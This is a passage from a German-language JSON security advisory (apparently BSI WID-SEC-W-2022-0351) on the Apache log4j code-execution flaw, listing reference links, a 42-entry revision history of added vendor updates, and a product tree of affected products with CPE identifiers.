"https://www.ibm.com/blogs/psirt/security-bulletin-content-manager-ondemand-for-multiplatforms-is-vulnerable-to-arbitrary-code-execution-due-to-apache-log4j-cve-2021-44228/" }, { "category": "external", "summary": "HCL Article KB0099131 vom 2022-07-24", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0099131" }, { "category": "external", "summary": "HCL Article KB0099671 vom 2022-07-24", "url": 
"https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0099671" }, { "category": "external", "summary": "HCL Article KB0099128 vom 2022-07-24", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0099128" }, { "category": "external", "summary": "HCL Article KB0099667 vom 2022-08-13", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0099667" }, { "category": "external", "summary": "HCL Article KB0099669 vom 2022-08-13", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0099669" }, { "category": "external", "summary": "Kyocera Informationen \u00fcber aktuelle Sicherheitshinweise", "url": "https://www.kyoceradocumentsolutions.de/de/support/sicherheitsluecken.html" }, { "category": "external", "summary": "HCL Article KB0100505 vom 2022-09-21", "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0100505" } ], "source_lang": "en-US", "title": "Apache log4j: Schwachstelle erm\u00f6glicht Codeausf\u00fchrung", "tracking": { "current_release_date": "2022-12-11T23:00:00.000+00:00", "generator": { "date": "2024-08-15T17:28:30.255+00:00", "engine": { "name": "BSI-WID", "version": "1.3.5" } }, "id": "WID-SEC-W-2022-0351", "initial_release_date": "2021-12-09T23:00:00.000+00:00", "revision_history": [ { "date": "2021-12-09T23:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" }, { "date": "2021-12-12T23:00:00.000+00:00", "number": "2", "summary": "Neue Updates von Fedora, Elastic, ExtremeNetworks, VMware, Fortinet, Amazon, IBM, Debian, Cisco, HCL und Symantec aufgenommen" }, { "date": "2021-12-13T23:00:00.000+00:00", "number": "3", "summary": "Neue Updates von Siemens, Unify und Juniper aufgenommen" }, { "date": "2021-12-14T23:00:00.000+00:00", "number": "4", "summary": "Neue Updates von Ubuntu, Red Hat, IBM, WIBU-SYSTEMS, Fedora und QNAP aufgenommen" }, { "date": "2021-12-15T23:00:00.000+00:00", "number": "5", "summary": "Neue Updates von 
IBM, Red Hat, HCL, Ubuntu, SUSE und Amazon aufgenommen" }, { "date": "2021-12-16T23:00:00.000+00:00", "number": "6", "summary": "Neue Updates von Avaya, Red Hat, Siemens, IBM, HITACHI und Palo Alto Networks aufgenommen" }, { "date": "2021-12-19T23:00:00.000+00:00", "number": "7", "summary": "Neue Updates von IBM, Amazon, Citrix, HCL und Ubuntu aufgenommen" }, { "date": "2021-12-20T23:00:00.000+00:00", "number": "8", "summary": "Neue Updates von NetApp und IBM aufgenommen" }, { "date": "2021-12-21T23:00:00.000+00:00", "number": "9", "summary": "Neue Updates von IBM aufgenommen" }, { "date": "2021-12-22T23:00:00.000+00:00", "number": "10", "summary": "Neue Updates von IBM und HCL aufgenommen" }, { "date": "2021-12-23T23:00:00.000+00:00", "number": "11", "summary": "Neue Updates von Amazon aufgenommen" }, { "date": "2021-12-27T23:00:00.000+00:00", "number": "12", "summary": "Neue Updates von HITACHI aufgenommen" }, { "date": "2022-01-06T23:00:00.000+00:00", "number": "13", "summary": "Referenz(en) aufgenommen: CSCWA47351, CSCWA52921, CSCWA54650, CSCWA56230" }, { "date": "2022-01-09T23:00:00.000+00:00", "number": "14", "summary": "Neue Updates von EMC und HP aufgenommen" }, { "date": "2022-01-10T23:00:00.000+00:00", "number": "15", "summary": "Neue Updates von IBM und SAP aufgenommen" }, { "date": "2022-01-11T23:00:00.000+00:00", "number": "16", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2022-01-12T23:00:00.000+00:00", "number": "17", "summary": "Neue Updates von Juniper, SmartBear und SOS GmbH aufgenommen" }, { "date": "2022-01-16T23:00:00.000+00:00", "number": "18", "summary": "Neue Updates von IBM aufgenommen" }, { "date": "2022-01-17T23:00:00.000+00:00", "number": "19", "summary": "Neue Updates von IBM aufgenommen" }, { "date": "2022-01-18T23:00:00.000+00:00", "number": "20", "summary": "Neue Updates von Unify aufgenommen" }, { "date": "2022-01-19T23:00:00.000+00:00", "number": "21", "summary": "Neue Updates von Red Hat aufgenommen" }, { 
"date": "2022-01-20T23:00:00.000+00:00", "number": "22", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2022-01-23T23:00:00.000+00:00", "number": "23", "summary": "Neue Updates aufgenommen" }, { "date": "2022-01-26T23:00:00.000+00:00", "number": "24", "summary": "Neue Updates von Red Hat und ASC aufgenommen" }, { "date": "2022-02-03T23:00:00.000+00:00", "number": "25", "summary": "Neue Updates von IBM aufgenommen" }, { "date": "2022-03-22T23:00:00.000+00:00", "number": "26", "summary": "Neue Updates von HCL aufgenommen" }, { "date": "2022-03-24T23:00:00.000+00:00", "number": "27", "summary": "Neue Updates von HCL aufgenommen" }, { "date": "2022-03-29T22:00:00.000+00:00", "number": "28", "summary": "Neue Updates von HCL aufgenommen" }, { "date": "2022-04-05T22:00:00.000+00:00", "number": "29", "summary": "Neue Updates von HCL aufgenommen" }, { "date": "2022-04-11T22:00:00.000+00:00", "number": "30", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2022-04-19T22:00:00.000+00:00", "number": "31", "summary": "Neue Updates von Amazon aufgenommen" }, { "date": "2022-04-24T22:00:00.000+00:00", "number": "32", "summary": "Neue Updates von HCL aufgenommen" }, { "date": "2022-04-26T22:00:00.000+00:00", "number": "33", "summary": "Neue Updates von AVAYA aufgenommen" }, { "date": "2022-04-27T22:00:00.000+00:00", "number": "34", "summary": "Neue Updates von HCL aufgenommen" }, { "date": "2022-05-17T22:00:00.000+00:00", "number": "35", "summary": "Neue Updates von HCL aufgenommen" }, { "date": "2022-06-16T22:00:00.000+00:00", "number": "36", "summary": "Neue Updates von Amazon aufgenommen" }, { "date": "2022-07-12T22:00:00.000+00:00", "number": "37", "summary": "Neue Updates von IBM aufgenommen" }, { "date": "2022-07-24T22:00:00.000+00:00", "number": "38", "summary": "Neue Updates von HCL aufgenommen" }, { "date": "2022-08-14T22:00:00.000+00:00", "number": "39", "summary": "Neue Updates von HCL aufgenommen" }, { "date": 
"2022-08-30T22:00:00.000+00:00", "number": "40", "summary": "Neue Updates aufgenommen" }, { "date": "2022-09-20T22:00:00.000+00:00", "number": "41", "summary": "Neue Updates von HCL aufgenommen" }, { "date": "2022-12-11T23:00:00.000+00:00", "number": "42", "summary": "Neue Updates von Amazon aufgenommen" } ], "status": "final", "version": "42" } }, "product_tree": { "branches": [ { "branches": [ { "category": "product_name", "name": "ASC NEO", "product": { "name": "ASC NEO", "product_id": "T021878", "product_identification_helper": { "cpe": "cpe:/a:asc:neo:-" } } } ], "category": "vendor", "name": "ASC" }, { "branches": [ { "category": "product_name", "name": "Amazon Linux 2", "product": { "name": "Amazon Linux 2", "product_id": "398363", "product_identification_helper": { "cpe": "cpe:/o:amazon:linux_2:-" } } } ], "category": "vendor", "name": "Amazon" }, { "branches": [ { "category": "product_name", "name": "Apache Kafka", "product": { "name": "Apache Kafka", "product_id": "T021247", "product_identification_helper": { "cpe": "cpe:/a:apache:kafka:-" } } }, { "category": "product_name", "name": "Apache Solr", "product": { "name": "Apache Solr", "product_id": "T021248", "product_identification_helper": { "cpe": "cpe:/a:apache:solr:-" } } }, { "category": "product_name", "name": "Apache Struts", "product": { "name": "Apache Struts", "product_id": "642", "product_identification_helper": { "cpe": "cpe:/a:apache:struts:-" } } }, { "category": "product_name", "name": "Apache log4j \u003c 2.16.0", "product": { "name": "Apache log4j \u003c 2.16.0", "product_id": "T021308", "product_identification_helper": { "cpe": "cpe:/a:apache:log4j:2.16.0" } } } ], "category": "vendor", "name": "Apache" }, { "branches": [ { "category": "product_name", "name": "Atlassian Bamboo", "product": { "name": "Atlassian Bamboo", "product_id": "T021265", "product_identification_helper": { "cpe": "cpe:/a:atlassian:bamboo:-" } } }, { "category": "product_name", "name": "Atlassian Bitbucket", 
"product": { "name": "Atlassian Bitbucket", "product_id": "T021356", "product_identification_helper": { "cpe": "cpe:/a:atlassian:bitbucket:-" } } }, { "category": "product_name", "name": "Atlassian Confluence", "product": { "name": "Atlassian Confluence", "product_id": "T016816", "product_identification_helper": { "cpe": "cpe:/a:atlassian:confluence:-" } } }, { "category": "product_name", "name": "Atlassian Crucible", "product": { "name": "Atlassian Crucible", "product_id": "T021266", "product_identification_helper": { "cpe": "cpe:/a:atlassian:crucible:-" } } }, { "category": "product_name", "name": "Atlassian Fisheye", "product": { "name": "Atlassian Fisheye", "product_id": "T021267", "product_identification_helper": { "cpe": "cpe:/a:atlassian:fisheye:-" } } }, { "category": "product_name", "name": "Atlassian Jira Software", "product": { "name": "Atlassian Jira Software", "product_id": "T015027", "product_identification_helper": { "cpe": "cpe:/a:atlassian:jira_software:-" } } } ], "category": "vendor", "name": "Atlassian" }, { "branches": [ { "category": "product_name", "name": "Avaya Analytics", "product": { "name": "Avaya Analytics", "product_id": "T021375", "product_identification_helper": { "cpe": "cpe:/a:avaya:analytics:-" } } }, { "category": "product_name", "name": "Avaya Aura Application Enablement Services", "product": { "name": "Avaya Aura Application Enablement Services", "product_id": "T015516", "product_identification_helper": { "cpe": "cpe:/a:avaya:aura_application_enablement_services:-" } } }, { "category": "product_name", "name": "Avaya Aura Device Services", "product": { "name": "Avaya Aura Device Services", "product_id": "T015517", "product_identification_helper": { "cpe": "cpe:/a:avaya:aura_device_services:-" } } }, { "category": "product_name", "name": "Avaya Aura Experience Portal", "product": { "name": "Avaya Aura Experience Portal", "product_id": "T015519", "product_identification_helper": { "cpe": "cpe:/a:avaya:aura_experience_portal:-" } } 
}, { "category": "product_name", "name": "Avaya Aura Media Server", "product": { "name": "Avaya Aura Media Server", "product_id": "1017", "product_identification_helper": { "cpe": "cpe:/a:avaya:media_server:-" } } }, { "category": "product_name", "name": "Avaya Aura Session Manager", "product": { "name": "Avaya Aura Session Manager", "product_id": "T015127", "product_identification_helper": { "cpe": "cpe:/a:avaya:session_manager:-" } } }, { "category": "product_name", "name": "Avaya Aura System Manager", "product": { "name": "Avaya Aura System Manager", "product_id": "T015518", "product_identification_helper": { "cpe": "cpe:/a:avaya:aura_system_manager:-" } } }, { "category": "product_name", "name": "Avaya Aura Web Gateway", "product": { "name": "Avaya Aura Web Gateway", "product_id": "T021376", "product_identification_helper": { "cpe": "cpe:/a:avaya:aura_web_gateway:-" } } }, { "category": "product_name", "name": "Avaya Breeze Platform", "product": { "name": "Avaya Breeze Platform", "product_id": "T015823", "product_identification_helper": { "cpe": "cpe:/a:avaya:breeze_platform:-" } } }, { "category": "product_name", "name": "Avaya Oceana", "product": { "name": "Avaya Oceana", "product_id": "T016589", "product_identification_helper": { "cpe": "cpe:/a:avaya:oceana:-" } } }, { "category": "product_name", "name": "Avaya Session Border Controller", "product": { "name": "Avaya Session Border Controller", "product_id": "T015520", "product_identification_helper": { "cpe": "cpe:/h:avaya:session_border_controller:-" } } }, { "category": "product_name", "name": "Avaya one-X", "product": { "name": "Avaya one-X", "product_id": "1024", "product_identification_helper": { "cpe": "cpe:/a:avaya:one-x:-" } } } ], "category": "vendor", "name": "Avaya" }, { "branches": [ { "category": "product_name", "name": "Cisco Application Policy Infrastructure Controller", "product": { "name": "Cisco Application Policy Infrastructure Controller", "product_id": "778219", 
"product_identification_helper": { "cpe": "cpe:/a:cisco:application_policy_infrastructure_controller:-" } } }, { "category": "product_name", "name": "Cisco Emergency Responder (ER)", "product": { "name": "Cisco Emergency Responder (ER)", "product_id": "2040", "product_identification_helper": { "cpe": "cpe:/a:cisco:emergency_responder:-" } } }, { "category": "product_name", "name": "Cisco Finesse", "product": { "name": "Cisco Finesse", "product_id": "199167", "product_identification_helper": { "cpe": "cpe:/a:cisco:finesse:-" } } }, { "category": "product_name", "name": "Cisco Firepower Dashboard", "product": { "name": "Cisco Firepower Dashboard", "product_id": "T011337", "product_identification_helper": { "cpe": "cpe:/a:cisco:firepower:-" } } }, { "category": "product_name", "name": "Cisco Identity Services Engine (ISE)", "product": { "name": "Cisco Identity Services Engine (ISE)", "product_id": "T000612", "product_identification_helper": { "cpe": "cpe:/a:cisco:identity_services_engine_software:-" } } }, { "category": "product_name", "name": "Cisco Integrated Management Controller", "product": { "name": "Cisco Integrated Management Controller", "product_id": "T014392", "product_identification_helper": { "cpe": "cpe:/a:cisco:integrated_management_controller:-" } } }, { "category": "product_name", "name": "Cisco Network Services Orchestrator", "product": { "name": "Cisco Network Services Orchestrator", "product_id": "T021358", "product_identification_helper": { "cpe": "cpe:/a:cisco:network_services_orchestrator:-" } } }, { "branches": [ { "category": "product_name", "name": "Cisco Nexus Dashboard", "product": { "name": "Cisco Nexus Dashboard", "product_id": "T021249", "product_identification_helper": { "cpe": "cpe:/h:cisco:nexus:::dashboard" } } }, { "category": "product_name", "name": "Cisco Nexus Insights", "product": { "name": "Cisco Nexus Insights", "product_id": "T021357", "product_identification_helper": { "cpe": "cpe:/h:cisco:nexus:insights" } } } ], 
"category": "product_name", "name": "Nexus" }, { "category": "product_name", "name": "Cisco SD-WAN vManage", "product": { "name": "Cisco SD-WAN vManage", "product_id": "T018812", "product_identification_helper": { "cpe": "cpe:/a:cisco:sd_wan:vmanage" } } }, { "branches": [ { "category": "product_name", "name": "Cisco Unified Communications Manager (CUCM) Session Management Edition", "product": { "name": "Cisco Unified Communications Manager (CUCM) Session Management Edition", "product_id": "T016315", "product_identification_helper": { "cpe": "cpe:/a:cisco:unified_communications_manager:session_management_edition" } } }, { "category": "product_name", "name": "Cisco Unified Communications Manager (CUCM) Cloud", "product": { "name": "Cisco Unified Communications Manager (CUCM) Cloud", "product_id": "T021250", "product_identification_helper": { "cpe": "cpe:/a:cisco:unified_communications_manager:::cloud" } } } ], "category": "product_name", "name": "Unified Communications Manager (CUCM)" }, { "branches": [ { "category": "product_name", "name": "Cisco Unified Computing System (UCS) Director", "product": { "name": "Cisco Unified Computing System (UCS) Director", "product_id": "T017032", "product_identification_helper": { "cpe": "cpe:/h:cisco:unified_computing_system:director_6.7.4.1" } } }, { "category": "product_name", "name": "Cisco Unified Computing System (UCS) Central Software", "product": { "name": "Cisco Unified Computing System (UCS) Central Software", "product_id": "T021359", "product_identification_helper": { "cpe": "cpe:/h:cisco:unified_computing_system:central_software" } } } ], "category": "product_name", "name": "Unified Computing System (UCS)" }, { "category": "product_name", "name": "Cisco Unified Contact Center Enterprise", "product": { "name": "Cisco Unified Contact Center Enterprise", "product_id": "2143", "product_identification_helper": { "cpe": "cpe:/a:cisco:unified_contact_center_enterprise:-" } } }, { "category": "product_name", "name": "Cisco 
Unified Contact Center Express (UCCX)", "product": { "name": "Cisco Unified Contact Center Express (UCCX)", "product_id": "915286", "product_identification_helper": { "cpe": "cpe:/a:cisco:unified_contact_center_express:-" } } }, { "category": "product_name", "name": "Cisco Unified Intelligence Center", "product": { "name": "Cisco Unified Intelligence Center", "product_id": "T018811", "product_identification_helper": { "cpe": "cpe:/a:cisco:unified_intelligence_center:-" } } }, { "category": "product_name", "name": "Cisco Unified Intelligent Contact Manager (ICM)", "product": { "name": "Cisco Unified Intelligent Contact Manager (ICM)", "product_id": "69412", "product_identification_helper": { "cpe": "cpe:/a:cisco:unified_intelligent_contact_management_enterprise:-" } } }, { "category": "product_name", "name": "Cisco Unity Connection", "product": { "name": "Cisco Unity Connection", "product_id": "T002044", "product_identification_helper": { "cpe": "cpe:/a:cisco:unity_connection:-" } } }, { "category": "product_name", "name": "Cisco Video Surveillance Operations Manager", "product": { "name": "Cisco Video Surveillance Operations Manager", "product_id": "196088", "product_identification_helper": { "cpe": "cpe:/a:cisco:video_surveillance_operations_manager:-" } } }, { "category": "product_name", "name": "Cisco WebEx Cloud-Connected UC", "product": { "name": "Cisco WebEx Cloud-Connected UC", "product_id": "T021251", "product_identification_helper": { "cpe": "cpe:/a:cisco:webex:::cloud-connected_uc" } } }, { "category": "product_name", "name": "Cisco WebEx Meetings Server", "product": { "name": "Cisco WebEx Meetings Server", "product_id": "T001160", "product_identification_helper": { "cpe": "cpe:/a:cisco:webex_meetings_server:-" } } } ], "category": "vendor", "name": "Cisco" }, { "branches": [ { "category": "product_name", "name": "Citrix Systems Virtual Apps and Desktops", "product": { "name": "Citrix Systems Virtual Apps and Desktops", "product_id": "876876", 
"product_identification_helper": { "cpe": "cpe:/a:citrix:virtual_apps_and_desktops:-::~~-~~~" } } } ], "category": "vendor", "name": "Citrix Systems" }, { "branches": [ { "category": "product_name", "name": "Debian Linux", "product": { "name": "Debian Linux", "product_id": "2951", "product_identification_helper": { "cpe": "cpe:/o:debian:debian_linux:-" } } } ], "category": "vendor", "name": "Debian" }, { "branches": [ { "category": "product_name", "name": "Dell Data Protection Advisor", "product": { "name": "Dell Data Protection Advisor", "product_id": "T021498", "product_identification_helper": { "cpe": "cpe:/a:dell:data_protection_advisor:-" } } } ], "category": "vendor", "name": "Dell" }, { "branches": [ { "category": "product_name", "name": "EMC Avamar", "product": { "name": "EMC Avamar", "product_id": "T014381", "product_identification_helper": { "cpe": "cpe:/a:emc:avamar:-" } } }, { "category": "product_name", "name": "EMC Data Domain", "product": { "name": "EMC Data Domain", "product_id": "T021496", "product_identification_helper": { "cpe": "cpe:/o:emc:data_domain:-" } } }, { "category": "product_name", "name": "EMC Data Domain OS", "product": { "name": "EMC Data Domain OS", "product_id": "T006099", "product_identification_helper": { "cpe": "cpe:/o:emc:data_domain_os:-" } } } ], "category": "vendor", "name": "EMC" }, { "branches": [ { "category": "product_name", "name": "F-Secure Policy Manager", "product": { "name": "F-Secure Policy Manager", "product_id": "T021242", "product_identification_helper": { "cpe": "cpe:/a:f-secure:policy_manager:-" } } } ], "category": "vendor", "name": "F-Secure" }, { "branches": [ { "category": "product_name", "name": "HCL Commerce", "product": { "name": "HCL Commerce", "product_id": "T019293", "product_identification_helper": { "cpe": "cpe:/a:hcltechsw:commerce:-" } } }, { "category": "product_name", "name": "HCL Domino", "product": { "name": "HCL Domino", "product_id": "777623", "product_identification_helper": { "cpe": 
"cpe:/a:hcltech:domino:-" } } } ], "category": "vendor", "name": "HCL" }, { "branches": [ { "category": "product_name", "name": "Hitachi Storage", "product": { "name": "Hitachi Storage", "product_id": "T009295", "product_identification_helper": { "cpe": "cpe:/h:hitachi:storage:-" } } } ], "category": "vendor", "name": "Hitachi" }, { "branches": [ { "category": "product_name", "name": "IBM Business Automation Workflow", "product": { "name": "IBM Business Automation Workflow", "product_id": "T019704", "product_identification_helper": { "cpe": "cpe:/a:ibm:business_automation_workflow:-" } } }, { "category": "product_name", "name": "IBM Content Manager", "product": { "name": "IBM Content Manager", "product_id": "T023838", "product_identification_helper": { "cpe": "cpe:/a:ibm:content_manager:-" } } }, { "category": "product_name", "name": "IBM DB2", "product": { "name": "IBM DB2", "product_id": "5104", "product_identification_helper": { "cpe": "cpe:/a:ibm:db2:-" } } }, { "category": "product_name", "name": "IBM InfoSphere Information Server", "product": { "name": "IBM InfoSphere Information Server", "product_id": "T019995", "product_identification_helper": { "cpe": "cpe:/a:ibm:infosphere_information_server:-" } } }, { "branches": [ { "category": "product_name", "name": "IBM Informix", "product": { "name": "IBM Informix", "product_id": "5121", "product_identification_helper": { "cpe": "cpe:/a:ibm:informix:-" } } }, { "category": "product_name", "name": "IBM Informix Dynamic Server", "product": { "name": "IBM Informix Dynamic Server", "product_id": "T021953", "product_identification_helper": { "cpe": "cpe:/a:ibm:informix:::dynamic_server" } } } ], "category": "product_name", "name": "Informix" }, { "branches": [ { "category": "product_name", "name": "IBM MQ 9.1", "product": { "name": "IBM MQ 9.1", "product_id": "T014765", "product_identification_helper": { "cpe": "cpe:/a:ibm:mq:9.1" } } }, { "category": "product_name", "name": "IBM MQ 9.2", "product": { "name": "IBM MQ 
9.2", "product_id": "T016984", "product_identification_helper": { "cpe": "cpe:/a:ibm:mq:9.2" } } } ], "category": "product_name", "name": "MQ" }, { "category": "product_name", "name": "IBM Operational Decision Manager", "product": { "name": "IBM Operational Decision Manager", "product_id": "T005180", "product_identification_helper": { "cpe": "cpe:/a:ibm:operational_decision_manager:-" } } }, { "category": "product_name", "name": "IBM Rational Software Architect", "product": { "name": "IBM Rational Software Architect", "product_id": "T005181", "product_identification_helper": { "cpe": "cpe:/a:ibm:rational_software_architect:-" } } }, { "category": "product_name", "name": "IBM SPSS", "product": { "name": "IBM SPSS", "product_id": "T013570", "product_identification_helper": { "cpe": "cpe:/a:ibm:spss:-" } } }, { "category": "product_name", "name": "IBM Security Guardium", "product": { "name": "IBM Security Guardium", "product_id": "T021345", "product_identification_helper": { "cpe": "cpe:/a:ibm:security_guardium:-" } } }, { "category": "product_name", "name": "IBM Spectrum Protect", "product": { "name": "IBM Spectrum Protect", "product_id": "T013661", "product_identification_helper": { "cpe": "cpe:/a:ibm:spectrum_protect:-" } } }, { "category": "product_name", "name": "IBM Spectrum Scale", "product": { "name": "IBM Spectrum Scale", "product_id": "T019402", "product_identification_helper": { "cpe": "cpe:/a:ibm:spectrum_scale:-" } } }, { "category": "product_name", "name": "IBM Tivoli Monitoring", "product": { "name": "IBM Tivoli Monitoring", "product_id": "T011128", "product_identification_helper": { "cpe": "cpe:/a:ibm:tivoli_monitoring:-" } } }, { "category": "product_name", "name": "IBM Tivoli Netcool/OMNIbus", "product": { "name": "IBM Tivoli Netcool/OMNIbus", "product_id": "T004181", "product_identification_helper": { "cpe": "cpe:/a:ibm:tivoli_netcool%2fomnibus:-" } } }, { "category": "product_name", "name": "IBM WebSphere Application Server", "product": { "name": 
"IBM WebSphere Application Server", "product_id": "5198", "product_identification_helper": { "cpe": "cpe:/a:ibm:websphere_application_server:-" } } } ], "category": "vendor", "name": "IBM" }, { "branches": [ { "category": "product_name", "name": "Juniper Junos Space", "product": { "name": "Juniper Junos Space", "product_id": "T003343", "product_identification_helper": { "cpe": "cpe:/a:juniper:junos_space:-" } } } ], "category": "vendor", "name": "Juniper" }, { "branches": [ { "category": "product_name", "name": "Kyocera Printer", "product": { "name": "Kyocera Printer", "product_id": "T015471", "product_identification_helper": { "cpe": "cpe:/h:kyocera:printer:-" } } } ], "category": "vendor", "name": "Kyocera" }, { "branches": [ { "category": "product_name", "name": "NetApp ActiveIQ Unified Manager", "product": { "name": "NetApp ActiveIQ Unified Manager", "product_id": "T016960", "product_identification_helper": { "cpe": "cpe:/a:netapp:active_iq_unified_manager:-" } } }, { "category": "product_name", "name": "NetApp Data ONTAP Tools for VMware vSphere", "product": { "name": "NetApp Data ONTAP Tools for VMware vSphere", "product_id": "T021401", "product_identification_helper": { "cpe": "cpe:/a:netapp:data_ontap:tools_for_vmware_vsphere" } } } ], "category": "vendor", "name": "NetApp" }, { "branches": [ { "category": "product_name", "name": "Open Source Elasticsearch", "product": { "name": "Open Source Elasticsearch", "product_id": "T010062", "product_identification_helper": { "cpe": "cpe:/a:elasticsearch:elasticsearch:-" } } }, { "category": "product_name", "name": "Open Source LogStash", "product": { "name": "Open Source LogStash", "product_id": "T021264", "product_identification_helper": { "cpe": "cpe:/a:elasticsearch:logstash:-" } } } ], "category": "vendor", "name": "Open Source" }, { "branches": [ { "category": "product_name", "name": "PaloAlto Networks PAN-OS", "product": { "name": "PaloAlto Networks PAN-OS", "product_id": "T012790", 
"product_identification_helper": { "cpe": "cpe:/o:paloaltonetworks:pan-os:-" } } } ], "category": "vendor", "name": "PaloAlto Networks" }, { "branches": [ { "category": "product_name", "name": "QNAP NAS", "product": { "name": "QNAP NAS", "product_id": "T017100", "product_identification_helper": { "cpe": "cpe:/h:qnap:nas:-" } } } ], "category": "vendor", "name": "QNAP" }, { "branches": [ { "category": "product_name", "name": "RSA SecurID Authentication Manager", "product": { "name": "RSA SecurID Authentication Manager", "product_id": "T021245", "product_identification_helper": { "cpe": "cpe:/h:rsa:securid:::authentication_manager" } } } ], "category": "vendor", "name": "RSA" }, { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux", "product": { "name": "Red Hat Enterprise Linux", "product_id": "67646", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:-" } } }, { "category": "product_name", "name": "Red Hat JBoss A-MQ", "product": { "name": "Red Hat JBoss A-MQ", "product_id": "T015887", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_amq:-" } } }, { "category": "product_name", "name": "Red Hat JBoss Enterprise Application Platform", "product": { "name": "Red Hat JBoss Enterprise Application Platform", "product_id": "T003085", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_enterprise_application_platform:-" } } }, { "category": "product_name", "name": "Red Hat OpenShift", "product": { "name": "Red Hat OpenShift", "product_id": "367115", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:-" } } }, { "category": "product_name", "name": "Red Hat OpenStack", "product": { "name": "Red Hat OpenStack", "product_id": "T003522", "product_identification_helper": { "cpe": "cpe:/a:redhat:openstack:-" } } }, { "category": "product_name", "name": "Red Hat Process Automation Manager", "product": { "name": "Red Hat Process Automation Manager", "product_id": "T021270", 
"product_identification_helper": { "cpe": "cpe:/a:redhat:process_automation_manager:-" } } } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "category": "product_name", "name": "SAP Software", "product": { "name": "SAP Software", "product_id": "T016476", "product_identification_helper": { "cpe": "cpe:/a:sap:sap:-" } } } ], "category": "vendor", "name": "SAP" }, { "branches": [ { "category": "product_name", "name": "SOS GmbH JobScheduler", "product": { "name": "SOS GmbH JobScheduler", "product_id": "T021263", "product_identification_helper": { "cpe": "cpe:/a:sos_gmbh:jobscheduler:-" } } } ], "category": "vendor", "name": "SOS GmbH" }, { "branches": [ { "category": "product_name", "name": "SUSE Linux", "product": { "name": "SUSE Linux", "product_id": "T002207", "product_identification_helper": { "cpe": "cpe:/o:suse:suse_linux:-" } } } ], "category": "vendor", "name": "SUSE" }, { "branches": [ { "category": "product_name", "name": "Siemens SIMATIC WinCC \u003c V7.4 SP1", "product": { "name": "Siemens SIMATIC WinCC \u003c V7.4 SP1", "product_id": "T021273", "product_identification_helper": { "cpe": "cpe:/a:siemens:simatic_wincc:v7.4_sp1" } } }, { "category": "product_name", "name": "Siemens SPPA-T3000", "product": { "name": "Siemens SPPA-T3000", "product_id": "668076", "product_identification_helper": { "cpe": "cpe:/a:siemens:sppa-t3000_application_server:-" } } } ], "category": "vendor", "name": "Siemens" }, { "branches": [ { "category": "product_name", "name": "SmartBear SoapUI", "product": { "name": "SmartBear SoapUI", "product_id": "T021577", "product_identification_helper": { "cpe": "cpe:/a:smartbear:soapui:-" } } } ], "category": "vendor", "name": "SmartBear" }, { "branches": [ { "category": "product_name", "name": "Splunk Splunk Enterprise", "product": { "name": "Splunk Splunk Enterprise", "product_id": "T008911", "product_identification_helper": { "cpe": "cpe:/a:splunk:splunk:-" } } } ], "category": "vendor", "name": "Splunk" }, { "branches": [ 
{ "category": "product_name", "name": "Symantec Endpoint Protection Manager", "product": { "name": "Symantec Endpoint Protection Manager", "product_id": "T021244", "product_identification_helper": { "cpe": "cpe:/a:symantec:endpoint_protection:::manager" } } } ], "category": "vendor", "name": "Symantec" }, { "branches": [ { "category": "product_name", "name": "TIBCO Managed File Transfer", "product": { "name": "TIBCO Managed File Transfer", "product_id": "T021367", "product_identification_helper": { "cpe": "cpe:/a:tibco:managed_file_transfer_internet_server:-" } } }, { "category": "product_name", "name": "TIBCO Spotfire", "product": { "name": "TIBCO Spotfire", "product_id": "T009185", "product_identification_helper": { "cpe": "cpe:/a:tibco:spotfire:-" } } }, { "category": "product_name", "name": "TIBCO Spotfire Statistics Services", "product": { "name": "TIBCO Spotfire Statistics Services", "product_id": "T021366", "product_identification_helper": { "cpe": "cpe:/a:tibco:spotfire_statistics_services:-" } } } ], "category": "vendor", "name": "TIBCO" }, { "branches": [ { "category": "product_name", "name": "Ubuntu Linux", "product": { "name": "Ubuntu Linux", "product_id": "T000126", "product_identification_helper": { "cpe": "cpe:/o:canonical:ubuntu_linux:-" } } } ], "category": "vendor", "name": "Ubuntu" }, { "branches": [ { "category": "product_name", "name": "Unify OpenScape 4000", "product": { "name": "Unify OpenScape 4000", "product_id": "T018011", "product_identification_helper": { "cpe": "cpe:/h:unify:openscape_4000:-" } } }, { "category": "product_name", "name": "Unify OpenScape Contact Center", "product": { "name": "Unify OpenScape Contact Center", "product_id": "T008876", "product_identification_helper": { "cpe": "cpe:/a:unify:openscape_contact_center:-" } } }, { "category": "product_name", "name": "Unify OpenScape Deployment Service (DLS)", "product": { "name": "Unify OpenScape Deployment Service (DLS)", "product_id": "T015711", 
"product_identification_helper": { "cpe": "cpe:/a:unify:openscape_deployment_service:-" } } }, { "category": "product_name", "name": "Unify OpenScape Mediaserver", "product": { "name": "Unify OpenScape Mediaserver", "product_id": "T018253", "product_identification_helper": { "cpe": "cpe:/a:unify:openscape_mediaserver:-" } } }, { "category": "product_name", "name": "Unify OpenScape UC Application \u003c V10.3.10", "product": { "name": "Unify OpenScape UC Application \u003c V10.3.10", "product_id": "T021274", "product_identification_helper": { "cpe": "cpe:/a:unify:openscape_uc_application:v10.3.10" } } }, { "category": "product_name", "name": "Unify OpenScape Voice", "product": { "name": "Unify OpenScape Voice", "product_id": "T008873", "product_identification_helper": { "cpe": "cpe:/a:unify:openscape_voice:-" } } }, { "category": "product_name", "name": "Unify OpenScape Xpert", "product": { "name": "Unify OpenScape Xpert", "product_id": "T018014", "product_identification_helper": { "cpe": "cpe:/h:unify:openscape_xpert:-" } } } ], "category": "vendor", "name": "Unify" }, { "branches": [ { "category": "product_name", "name": "VMware Carbon Black Cloud Workload", "product": { "name": "VMware Carbon Black Cloud 